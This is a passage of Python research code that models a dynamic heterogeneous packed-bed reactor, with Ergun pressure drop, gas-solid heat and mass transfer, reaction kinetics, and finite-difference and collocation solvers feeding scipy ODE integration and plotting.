MoFlRa = CoSp*SuGaVe*CrSeAr
# molar flowrate list [kmol/s]
MoFlRai = MoFlRa*MoFri
# convert to [mol/s]
MoFlRai_Con1 = 1000*MoFlRai
# molar flux [kmol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai_Con1)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp*1000)
GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# NOTE
# ergun equation
ergA = 150*GaMiVi*SuGaVe/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
# dxdt.append(dxdt_P)
P_z[z+1] = dxdt_P*dz + P_z[z]
# REVIEW
# FIXME
# viscosity in the gas phase [Pa.s] | [kg/m.s]
GaVi = np.zeros(compNo) # f(T);
# mixture viscosity in the gas phase [Pa.s] | [kg/m.s]
GaViMix = 2.5e-5 # f(yi,GaVi,MWs);
# kinematic viscosity in the gas phase [m^2/s]
GaKiViMix = GaViMix/GaDe
# REVIEW
# FIXME
# add loop for each r point/constant
# catalyst thermal conductivity [J/s.m.K]
# CaThCo
# membrane wall thermal conductivity [J/s.m.K]
MeThCo = 1
# thermal conductivity - gas phase [J/s.m.K]
# GaThCoi = np.zeros(compNo) # f(T);
GaThCoi = np.array([0.278863993072407, 0.0353728593093126, 0.0378701882504170,
0.0397024608654616, 0.0412093811132403, 0.0457183034548015])
# mixture thermal conductivity - gas phase [J/s.m.K]
# convert
GaThCoMix = 0.125
# thermal conductivity - solid phase [J/s.m.K]
# assume the same as gas phase
# SoThCoi = np.zeros(compNo) # f(T);
SoThCoi = GaThCoi
# mixture thermal conductivity - solid phase [J/s.m.K]
SoThCoMix = 0.125
# effective thermal conductivity - gas phase [J/s.m.K]
# GaThCoEff = BeVoFr*GaThCoMix + (1 - BeVoFr)*CaThCo
GaThCoEff = BeVoFr*GaThCoMix
# effective thermal conductivity - solid phase [J/s.m.K]
# SoThCoEff0 = CaPo*SoThCoMix + (1 - CaPo)*CaThCo
SoThCoEff = CaThCo*((1 - CaPo)/CaTo)
# REVIEW
# diffusivity coefficient - gas phase [m^2/s]
# GaDii = np.zeros(compNo) # gas_diffusivity_binary(yi,T,P0);
GaDii = np.array([6.61512999110972e-06, 2.12995183554984e-06, 1.39108654241678e-06,
2.20809430865725e-06, 9.64429037148681e-07, 8.74374373632434e-07])
# effective diffusivity - solid phase [m2/s]
SoDiiEff = (CaPo/CaTo)*GaDii
# REVIEW
### dimensionless numbers ###
# Re Number
ReNu = calReNoEq1(GaDe, SuGaVe, PaDi, GaViMix)
# Sc Number
ScNu = calScNoEq1(GaDe, GaViMix, GaDii)
# Sh Number (choose method)
ShNu = calShNoEq1(ScNu, ReNu, CONST_EQ_Sh['Frossling'])
# REVIEW
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu, GaDii, PaDi)
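# Re and Sc give Sh via a Frossling-type correlation; the gas-solid mass transfer
# coefficient is then recovered from Sh (typically kc = Sh*Di/dp, as assumed here),
# and the same Pr/Nu pattern is used below for the heat transfer coefficient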
# NOTE
## kinetics ##
# net reaction rate expression [kmol/m^3.s]
# rf[kmol/kgcat.s]*CaDe[kgcat/m^3]
for r in range(rNo):
#
# r0 = np.array(PackedBedReactorClass.modelReactions(
# P_z[z], Ts_r[r], MoFrsi_r[r], CaDe))
# loop
loopVars0 = (Ts_r[r], P_z[z], MoFrsi_r[r], CosSpi_r[r])
# component formation rate [mol/m^3.s]
# check unit
r0 = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
# loop
Ri_zr[z, r, :] = r0
Ri_r[r, :] = r0
# reset
_riLoop = 0
# REVIEW
# component formation rate [kmol/m^3.s]
# ri = np.zeros(compNo)
# for k in range(compNo):
# # reset
# _riLoop = 0
# # number of reactions
# for m in range(len(reactionStochCoeff)):
# # number of components in each reaction
# for n in range(len(reactionStochCoeff[m])):
# # check component id
# if comList[k] == reactionStochCoeff[m][n][0]:
# _riLoop += reactionStochCoeff[m][n][1] * \
# Ri_r[r][m]
# ri_r0[r][k] = _riLoop
ri_r[r] = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri_r[r])
# overall formation rate [kmol/m^3.s]
OvR[r] = np.sum(ri_r[r])
# NOTE
### enthalpy calculation ###
# gas phase
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList = calMeanHeatCapacityAtConstantPressure(comList, T)
# Cp mixture
GaCpMeanMix = calMixtureHeatCapacityAtConstantPressure(
MoFri, GaCpMeanList)
# effective heat capacity - gas phase [kJ/kmol.K] | [J/mol.K]
GaCpMeanMixEff = GaCpMeanMix*BeVoFr
# FIXME
# effective heat capacity - solid phase [kJ/m^3.K]
SoCpMeanMixEff = CoSp*GaCpMeanMix*CaPo + (1-CaPo)*CaDe*CaSpHeCa
# solid phase
for r in range(rNo):
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
SoCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, Ts_r[r])
# Cp mixture
SoCpMeanMix[r] = calMixtureHeatCapacityAtConstantPressure(
MoFrsi_r[r], SoCpMeanList)
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(
calEnthalpyChangeOfReaction(reactionListSorted, Ts_r[r]))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [kJ/m^3.s]
# exothermic reaction (negative sign)
# endothermic reaction (positive sign)
OvHeReT[r] = np.dot(Ri_r[r, :], HeReT)
# REVIEW
# Prandtl Number
# MW kg/mol -> g/mol
# MiMoWe_Conv = 1000*MiMoWe
PrNu = calPrNoEq1(
GaCpMeanMix, GaViMix, GaThCoMix, MiMoWe)
# Nu number
NuNu = calNuNoEq1(PrNu, ReNu)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu, GaThCoMix, PaDi)
# REVIEW
# heat transfer coefficient - medium side [J/m2.s.K]
# hs = heat_transfer_coefficient_shell(T,Tv,Pv,Pa);
# overall heat transfer coefficient [J/m2.s.K]
# U = overall_heat_transfer_coefficient(hfs,kwall,do,di,L);
# heat transfer coefficient - permeate side [J/m2.s.K]
# NOTE
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m^2/m^3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
Ua = U*a
# external heat [kJ/m^3.s]
# if Tm == 0:
# # adiabatic
# Qm0 = 0
# else:
# # heat added/removed from the reactor
# # Tm > T: heat is added (positive sign)
# # T > Tm: heat removed (negative sign)
# Qm0 = (Ua*(Tm - T))*1e-3
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T, U, a, 'kJ/m^3.s')
# NOTE
# mass transfer between
for i in range(compNo):
### gas phase ###
# mass balance (forward difference)
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# concentration in the catalyst surface [kmol/m^3]
# CosSpi_cat
# inward flux [kmol/m^2.s]
MoFli_z[i] = MaTrCo[i]*(Ci_c - CosSpi_cat[i])
# total mass transfer between gas and solid phases [kmol/m^3]
ToMaTrBeGaSo_z = np.sum(MoFli_z)*SpSuAr
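# film model: the per-component flux kc_i*(Ci_bulk - Ci_surface) multiplied by the
# specific surface area gives the volumetric gas-to-solid transfer rate [kmol/m^3.s]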
# NOTE
# velocity from global concentration
# check BC
# if z == 0:
# # BC1
# T_b = T0
# else:
# # interior nodes
# T_b = T_z[z - 1]
# check BC
if z == 0:
# BC1
constT_BC1 = (GaThCoEff)/(MoFl*GaCpMeanMix/1000)
# next node
T_f = T_z[z+1]
# previous node
T_b = (T0*dz + constT_BC1*T_f)/(dz + constT_BC1)
elif z == zNo - 1:
# BC2
# previous node
T_b = T_z[z - 1]
# next node
T_f = 0
else:
# interior nodes
T_b = T_z[z-1]
# next node
T_f = T_z[z+1]
dxdt_v_T = (T_z[z] - T_b)/dz
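# at the inlet the ghost value T_b follows an (effectively Danckwerts-type) closure
# balancing convective inflow against axial conduction; interior nodes use the upwind neighbour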
# CoSp x 1000
# OvR x 1000
dxdt_v = (1/(CoSp*1000))*((-SuGaVe/CONST.R_CONST) *
((1/T)*dxdt_P - (P/T**2)*dxdt_v_T) - ToMaTrBeGaSo_z*1000)
# the forward node of the velocity profile is updated here using the backward (old)
# temperature value; dT/dt corrects that value at the next time step
v_z[z+1] = dxdt_v*dz + v_z[z]
# NOTE
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
# loop vars
const_F1 = 1/BeVoFr
# [kmol/m^2.s][kJ/kmol.K]=[kJ/m^2.s.K]
const_T1 = MoFl*GaCpMeanMix
# [kmol/m^3][kJ/kmol.K]=[kJ/m^3.K]
const_T2 = 1/(CoSp*GaCpMeanMixEff)
# catalyst
const_Cs1 = 1/(CaPo*(PaRa**2))
const_Ts1 = 1/(SoCpMeanMixEff*(PaRa**2))
# bulk temperature [K]
T_c = T_z[z]
# REVIEW
# gas-solid interface BC
# concentration: [m]*([m/s]/[m^2/s]) = dimensionless (mass Biot-type number)
betaC = PaRa*(MaTrCo/SoDiiEff)
# temperature
betaT = -1*((HeTrCo*PaRa)/SoThCoEff)
# universal index [j,i]
# UISet = z*(rNo + 1)
# NOTE
# concentration [mol/m^3]
for i in range(compNo):
### gas phase ###
# mass balance (forward difference)
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# check BC
if z == 0:
# BC1
constC_BC1 = GaDii[i]*BeVoFr/v_z[z]
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_b = (1/(constC_BC1 + dz)) * \
(SpCoi0[i]*dz + constC_BC1*(Ci_f))
elif z == zNo - 1:
# BC2
# forward difference
Ci_f = 0
# previous node
Ci_b = max(SpCoi_z[i][z - 1], CONST.EPS_CONST)
else:
# forward
Ci_f = SpCoi_z[i][z+1]
# interior nodes
Ci_b = max(SpCoi_z[i][z - 1], CONST.EPS_CONST)
# cal differentiate
# backward difference
dCdz = (Ci_c - Ci_b)/dz
# central difference for dispersion
d2Cdz2 = (Ci_b - 2*Ci_c + Ci_f)/(dz**2)
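# Ci_b at z == 0 is a ghost value from a Danckwerts-type inlet condition,
# v*(Ci_b - C0) = D_eff*(Ci_f - Ci_b)/dz; at the last node the forward value is
# simply taken as zero to close the second-order stencil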
# dispersion term [kmol/m^3.s]
_dispersionFluxC = GaDii[i]*BeVoFr*d2Cdz2
# concentration in the catalyst surface [kmol/m^3]
# CosSpi_cat
# inward flux [kmol/m^2.s]
# MoFli_z[i] = MaTrCo[i]*(Ci_c - CosSpi_cat[i])
# mass balance
# convective, dispersion, inward flux
dxdt_F = const_F1 * \
(-v_z[z]*dCdz - Ci_c*dxdt_v +
_dispersionFluxC - MoFli_z[i]*SpSuAr)
dxdtMat[i][0][z] = dxdt_F
### solid phase ###
# bulk concentration [kmol/m^3]
# Ci_c
# bulk temperature [K]
# T_c
# species concentration at different points of particle radius [rNo]
# [Cs[3], Cs[2], Cs[1], Cs[0]]
_Cs_r = CosSpi_r[:, i].flatten()
# updated concentration gas-solid interface
# shape(rNo,1)
_Cs_r_Updated = OrCoCatParticleClassSet.CalUpdateYnSolidGasInterface(
_Cs_r, Ci_c, betaC[i])
# dC/dt list
dCsdti = OrCoCatParticleClassSet.buildOrCoMatrix(
_Cs_r_Updated, SoDiiEff[i], (PaRa**2)*ri_r[:, i])
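# CalUpdateYnSolidGasInterface imposes the gas-solid Robin condition (via betaC) on the
# surface node; buildOrCoMatrix then gives the collocation RHS for d(Cs)/dt at the rNo
# radial points, scaled by const_Cs1 = 1/(CaPo*Rp^2) in the loop below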
for r in range(rNo):
# update
dxdtMat[i][r+1][z] = const_Cs1*dCsdti[r]
# NOTE
# energy balance (temperature) [K]
# temp [K]
# T_c = T_z[z]
# temperature at different points of particle radius [rNo]
# Ts[3], Ts[2], Ts[1], Ts[0]
_Ts_r = Ts_r.flatten()
# check BC
if z == 0:
# BC1
constT_BC1 = (GaThCoEff)/(MoFl*GaCpMeanMix*1000)
# next node
T_f = T_z[z+1]
# previous node
T_b = (T0*dz + constT_BC1*T_f)/(dz + constT_BC1)
elif z == zNo - 1:
# BC2
# previous node
T_b = T_z[z - 1]
# next node
T_f = 0
else:
# interior nodes
T_b = T_z[z - 1]
# next node
T_f = T_z[z+1]
# cal differentiate
# backward difference
dTdz = (T_c - T_b)/dz
# central difference
d2Tdz2 = (T_b - 2*T_c + T_f)/(dz**2)
# FIXME
# dispersion flux [kJ/m^3.s]
_dispersionFluxT = (GaThCoEff*d2Tdz2)*1e-3*0
# temperature in the catalyst surface [K]
# Ts_cat
# outward flux [kJ/m^2.s]
InFlT = HeTrCo*(_Ts_r[0] - T_c)*1e-3
# total heat transfer between gas and solid [kJ/m^3.s]
ToHeTrBeGaSo_z = InFlT*SpSuAr
# convective flux, diffusive flux, enthalpy of reaction, cooling heat
dxdt_T = const_T2 * \
(-const_T1*dTdz + _dispersionFluxT + ToHeTrBeGaSo_z + Qm)
dxdtMat[indexT][0][z] = dxdt_T
### solid phase ###
# _Ts_r
# T[n], T[n-1], ..., T[0]
# updated temperature gas--solid interface
_Ts_r_Updated = OrCoCatParticleClassSet.CalUpdateYnSolidGasInterface(
_Ts_r, T_c, betaT)
# dC/dt list
# convert
# [J/s.m.K] => [kJ/s.m.K]
SoThCoEff_Conv = SoThCoEff/1000
# OvHeReT [kJ/m^3.s]
OvHeReT_Conv = -1*OvHeReT
dTsdti = OrCoCatParticleClassSet.buildOrCoMatrix(
_Ts_r_Updated, SoThCoEff_Conv, (PaRa**2)*OvHeReT_Conv)
for r in range(rNo):
# update
dxdtMat[indexT][r+1][z] = const_Ts1*dTsdti[r]
# NOTE
# set time
# flat
dxdt = dxdtMat.flatten().tolist()
return dxdt
# NOTE
# dynamic heterogeneous modeling
def runM7(self):
"""
M7 modeling case (dimensionless)
dynamic model
unknowns: Ci, T (dynamic), P, v (static), Cci, Tc (dynamic, for catalyst)
CT, GaDe = f(P, T, n)
numerical method: finite difference
"""
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
solverMesh = solverConfig['mesh']
solverMeshSet = True if solverMesh == "normal" else False
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# operation time [s]
opT = self.modelInput['operating-conditions']['period']
# numerical method
numericalMethod = self.modelInput['operating-conditions']['numerical-method']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# number of reactions
reactionListNo = len(reactionList)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
# labelList.append("Pressure")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
indexVelocity = indexPressure + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [kmol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [kmol/m^3]
SpCo0 = np.sum(SpCoi0)
# inlet superficial velocity [m/s]
SuGaVe0 = self.modelInput['feed']['superficial-velocity']
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# diffusivity coefficient - gas phase [m^2/s]
GaDii0 = self.modelInput['feed']['diffusivity']
# gas viscosity [Pa.s]
GaVii0 = self.modelInput['feed']['viscosity']
# gas mixture viscosity [Pa.s]
GaViMix0 = self.modelInput['feed']['mixture-viscosity']
# thermal conductivity - gas phase [J/s.m.K]
GaThCoi0 = self.modelInput['feed']['thermal-conductivity']
# mixture thermal conductivity - gas phase [J/s.m.K]
GaThCoMix0 = self.modelInput['feed']['mixture-thermal-conductivity']
# REVIEW
# domain length
DoLe = 1
# orthogonal collocation points in the r direction
# rNo = solverSetting['S2']['rNo']
if numericalMethod == "fdm":
# finite difference points in the r direction
rNo = solverSetting['T1']['rNo']['fdm']
elif numericalMethod == "oc":
# orthogonal collocation points in the r direction
rNo = solverSetting['T1']['rNo']['oc']
else:
raise ValueError(f"unknown numerical method: {numericalMethod}")
# mesh setting
zMesh = solverSetting['T1']['zMesh']
# number of nodes
zNoNo = zMesh['zNoNo']
# domain length section
DoLeSe = zMesh['DoLeSe']
# mesh refinement degree
MeReDe = zMesh['MeReDe']
# mesh installment
if solverMeshSet is False:
zMeshRes = FiDiMeshGenerator(zNoNo, DoLe, DoLeSe, MeReDe)
# finite difference points
dataXs = zMeshRes['data1']
# dz lengths
dzs = zMeshRes['data2']
# finite difference point number
zNo = zMeshRes['data3']
# R ratio
zR = zMeshRes['data4']
# dz
dz = zMeshRes['data5']
else:
# finite difference points in the z direction
zNo = solverSetting['T1']['zNo']
# length list [reactor length]
dataXs = np.linspace(0, DoLe, zNo)
# element size - dz [m]
dz = DoLe/(zNo-1)
# reset
dzs = []
zR = []
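# with mesh refinement enabled, FiDiMeshGenerator supplies a non-uniform z grid
# (local dz list and ratio zR); otherwise a uniform grid of zNo points is used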
### calculation ###
# mole fraction in the gas phase
MoFri0 = np.array(rmtUtil.moleFractionFromConcentrationSpecies(SpCoi0))
# mixture molecular weight [kg/mol]
MiMoWe0 = rmtUtil.mixtureMolecularWeight(MoFri0, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe0 = calDensityIG(MiMoWe0, SpCo0*1000)
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList0 = calMeanHeatCapacityAtConstantPressure(compList, T)
# Cp mixture
GaCpMeanMix0 = calMixtureHeatCapacityAtConstantPressure(
MoFri0, GaCpMeanList0)
# thermal diffusivity in the gas phase [m^2/s]
GaThDi = calThermalDiffusivity(
GaThCoMix0, GaDe0, GaCpMeanMix0, MiMoWe0)
# var no (Ci,T)
varNo = compNo + 1
# concentration var no
varNoCon = compNo*zNo
# temperature var no
varNoTemp = 1*zNo
# concentration in solid phase
varNoConInSolidBlock = rNo*compNo
# total number
varNoConInSolid = varNoConInSolidBlock*zNo
# total var no along the reactor length (in gas phase)
varNoT = varNo*zNo
# number of layers
# concentration layer for each component C[m,j,i]
# m: layer, j: row (rNo), i: column (zNo)
# number of layers
noLayer = compNo + 1
# var no in each layer
varNoLayer = zNo*(rNo+1)
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = noLayer*varNoLayer
# concentration var number
varNoCon = compNo*varNoLayer
# number of var rows [j]
varNoRows = rNo + 1
# number of var columns [i]
varNoColumns = zNo
# initial values at t = 0 and z >> 0
IVMatrixShape = (noLayer, varNoRows, varNoColumns)
IV2D = np.zeros(IVMatrixShape)
# initialize IV2D
# -> concentration [kmol/m^3]
for m in range(noLayer - 1):
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
# inlet (i == 0) and interior nodes share the same normalized initial value
IV2D[m][j][i] = SpCoi0[m]/np.max(SpCoi0)
else:
# solid phase
# SpCoi0[m]/np.max(SpCoi0) # SpCoi0[m]
IV2D[m][j][i] = 1e-6
# temperature
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
# dimensionless temperature starts at zero for all axial nodes
IV2D[noLayer - 1][j][i] = 0 # T
else:
# solid phase
IV2D[noLayer - 1][j][i] = 0 # T
# flatten IV
IV = IV2D.flatten()
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# REVIEW
# solver setting
# NOTE
### dimensionless analysis ###
# concentration [kmol/m^3]
Cif = np.copy(SpCoi0)
# total concentration
Cf = SpCo0
# temperature [K]
Tf = T
# superficial velocity [m/s]
vf = SuGaVe0
# length [m]
zf = ReLe
# diffusivity [m^2/s]
Dif = np.copy(GaDii0)
# heat capacity at constant pressure [J/mol.K] | [kJ/kmol.K]
Cpif = np.copy(GaCpMeanList0)
# mixture heat capacity [J/mol.K] | [kJ/kmol.K]
Cpf = GaCpMeanMix0
# radius
rf = PaDi/2
# gas phase
# mass convective term - (list) [kmol/m^3.s]
_Cif = Cif if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.repeat(
np.max(Cif), compNo)
GaMaCoTe0 = (vf/zf)*_Cif
# mass diffusive term - (list) [kmol/m^3.s]
GaMaDiTe0 = (1/zf**2)*(_Cif*Dif)
# heat convective term [kJ/m^3.s]
GaHeCoTe0 = (GaDe0*vf*Tf*(Cpf/MiMoWe0)/zf)*1e-3
# heat diffusive term [kJ/m^3.s]
GaHeDiTe0 = (Tf*GaThCoMix0/zf**2)*1e-3
# solid phase
# mass diffusive term - (list) [kmol/m^3.s]
SoMaDiTe0 = (Dif*_Cif)/rf**2
# heat diffusive term [kJ/m^3.s]
SoHeDiTe0 = (GaThCoMix0*Tf/rf**2)*1e-3
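# these characteristic convective/diffusive magnitudes for the gas and solid phases
# are the scales used to non-dimensionalize the balance equations in modelEquationM7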
### dimensionless numbers ###
# Re Number
ReNu0 = calReNoEq1(GaDe0, SuGaVe0, PaDi, GaViMix0)
# Sc Number
ScNu0 = calScNoEq1(GaDe0, GaViMix0, GaDii0)
# Sh Number (choose method)
ShNu0 = calShNoEq1(ScNu0, ReNu0, CONST_EQ_Sh['Frossling'])
# Prandtl Number
PrNu0 = calPrNoEq1(GaCpMeanMix0, GaViMix0, GaThCoMix0, MiMoWe0)
# Nu number
NuNu0 = calNuNoEq1(PrNu0, ReNu0)
# Strouhal number
StNu = 1
# Peclet number - mass transfer
PeNuMa0 = (vf*zf)/Dif
# Peclet number - heat transfer
PeNuHe0 = (zf*GaDe0*(Cpf/MiMoWe0)*vf)/GaThCoMix0
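# Peclet numbers: Pe_mass = v*L/Di (per component) and Pe_heat = L*rho*cp*v/k,
# i.e. the ratio of axial convection to axial dispersion/conduction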
### transfer coefficient ###
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu0, GaDii0, PaDi)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu0, GaThCoMix0, PaDi)
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaViMix0,
"varNo": varNo,
"varNoT": varNoT,
"reactionListNo": reactionListNo,
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T,
"SuGaVe0": SuGaVe0,
"GaDii0": GaDii0,
"GaThCoi0": GaThCoi0,
"GaVii0": GaVii0,
"GaDe0": GaDe0,
"GaCpMeanMix0": GaCpMeanMix0,
"GaThCoMix0": GaThCoMix0
},
"meshSetting": {
"solverMesh": solverMesh,
"solverMeshSet": solverMeshSet,
"noLayer": noLayer,
"varNoLayer": varNoLayer,
"varNoLayerT": varNoLayerT,
"varNoRows": varNoRows,
"varNoColumns": varNoColumns,
"rNo": rNo,
"zNo": zNo,
"dz": dz,
"dzs": dzs,
"zR": zR,
"zNoNo": zNoNo
},
"solverSetting": {
"dFdz": solverSetting['T1']['dFdz'],
"d2Fdz2": solverSetting['T1']['d2Fdz2'],
"dTdz": solverSetting['T1']['dTdz'],
"d2Tdz2": solverSetting['T1']['d2Tdz2'],
},
"reactionRateExpr": reactionRateExpr
}
# dimensionless analysis parameters
DimensionlessAnalysisParams = {
"Cif": Cif,
"Tf": Tf,
"vf": vf,
"zf": zf,
"Dif": Dif,
"Cpif": Cpif,
"Cpf": Cpf,
"rf": rf,
"GaMaCoTe0": GaMaCoTe0,
"GaMaDiTe0": GaMaDiTe0,
"GaHeCoTe0": GaHeCoTe0,
"GaHeDiTe0": GaHeDiTe0,
"ReNu0": ReNu0,
"ScNu0": ScNu0,
"ShNu0": ShNu0,
"PrNu0": PrNu0,
"PeNuMa0": PeNuMa0,
"PeNuHe0": PeNuHe0,
"MaTrCo": MaTrCo,
"HeTrCo": HeTrCo,
"SoMaDiTe0": SoMaDiTe0,
"SoHeDiTe0": SoHeDiTe0
}
# time span
tNo = solverSetting['T1']['tNo']
opTSpan = np.linspace(0, opT, tNo + 1)
# save data
timesNo = solverSetting['T1']['timesNo']
# result
dataPack = []
# build data list
# over time
dataPacktime = np.zeros((varNo, tNo, zNo))
#
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# FIXME
n = solverSetting['T1']['ode-solver']['PreCorr3']['n']
# t0 = 0
# tn = 5
# t = np.linspace(t0, tn, n+1)
paramsSet = (reactionListSorted, reactionStochCoeff,
FunParam, DimensionlessAnalysisParams)
funSet = PackedBedReactorClass.modelEquationM7
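# two integration paths: "AM" uses the fixed-step predictor-corrector PreCorr3 with n
# sub-steps per interval; otherwise scipy's solve_ivp with the selected variable-step method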
# time loop
for i in range(tNo):
# set time span
t = np.array([opTSpan[i], opTSpan[i+1]])
times = np.linspace(t[0], t[1], timesNo)
print(f"time: {t} seconds")
# ode call
if solverIVP == "AM":
# sol = AdBash3(t[0], t[1], n, IV, funSet, paramsSet)
# PreCorr3
sol = PreCorr3(t[0], t[1], n, IV, funSet, paramsSet)
successStatus = True
# time interval
dataTime = t
# all results
# components, temperature layers
dataYs = sol
else:
# method [1]: LSODA, [2]: BDF, [3]: Radau
# options
solverOptions = {
"atol": 1e-7
}
sol = solve_ivp(funSet, t, IV, method=solverIVP,
t_eval=times, args=(paramsSet,))
# ode result
successStatus = sol.success
# check
if successStatus is False:
raise RuntimeError("ODE solver failed for the current time interval")
# time interval
dataTime = sol.t
# all results
# components, temperature layers
dataYs = sol.y
# REVIEW
# post-processing result
# std format
dataYs_Reshaped = np.reshape(
dataYs[:, -1], (noLayer, varNoRows, varNoColumns))
# component concentration [kmol/m^3]
# Ci and Cs
# dataYs1 = dataYs[0:varNoCon, -1]
# 3d matrix
# dataYs1_Reshaped = np.reshape(
# dataYs1, (compNo, varNoRows, varNoColumns))
dataYs1_Reshaped = dataYs_Reshaped[:-1]
# gas phase
dataYs1GasPhase = dataYs1_Reshaped[:, 0, :]
# solid phase
dataYs1SolidPhase = dataYs1_Reshaped[:, 1:, :]
# REVIEW
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1GasPhase, axis=0)
dataYs1_MoFri = dataYs1GasPhase/dataYs1_Ctot
# temperature - 2d matrix
dataYs2_Reshaped = dataYs_Reshaped[indexTemp]
# gas phase
dataYs2GasPhase = dataYs2_Reshaped[0, :].reshape((1, zNo))
# solid phase
dataYs2SolidPhase = dataYs2_Reshaped[1:, :]
# combine
_dataYs = np.concatenate(
(dataYs1_MoFri, dataYs2GasPhase), axis=0)
# save data
dataPack.append({
"successStatus": successStatus,
"dataTime": dataTime[-1],
"dataYCon": dataYs1GasPhase,
"dataYTemp": dataYs2GasPhase,
"dataYs": _dataYs,
"dataYCons": dataYs1SolidPhase,
"dataYTemps": dataYs2SolidPhase,
})
for m in range(varNo):
# var list
dataPacktime[m][i, :] = dataPack[i]['dataYs'][m, :]
# update initial values [IV]
IV = dataYs[:, -1]
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# NOTE
# steady-state result
# txt
# ssModelingResult = np.loadtxt('ssModeling.txt', dtype=np.float64)
# binary
# ssModelingResult = np.load('ResM1.npy')
# ssdataXs = np.linspace(0, ReLe, zNo)
# ssXYList = pltc.plots2DSetXYList(dataXs, ssModelingResult)
# ssdataList = pltc.plots2DSetDataList(ssXYList, labelList)
# datalists
# ssdataLists = [ssdataList[0:compNo],
# ssdataList[indexTemp]]
# subplot result
# pltc.plots2DSub(ssdataLists, "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# plot info
plotTitle = f"Dynamic Modeling for opT: {opT} with zNo: {zNo}, tNo: {tNo} within {elapsed} seconds"
# REVIEW
# display result at specific time
# subplot result
xLabelSet = "Dimensionless Reactor Length"
yLabelSet = "Dimensionless Concentration"
for i in range(tNo):
# var list
_dataYs = dataPack[i]['dataYs']
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp]]
if i == tNo-1:
# subplot result
pltc.plots2DSub(dataLists, xLabelSet, yLabelSet, plotTitle)
# REVIEW
# display result within time span
_dataListsLoop = []
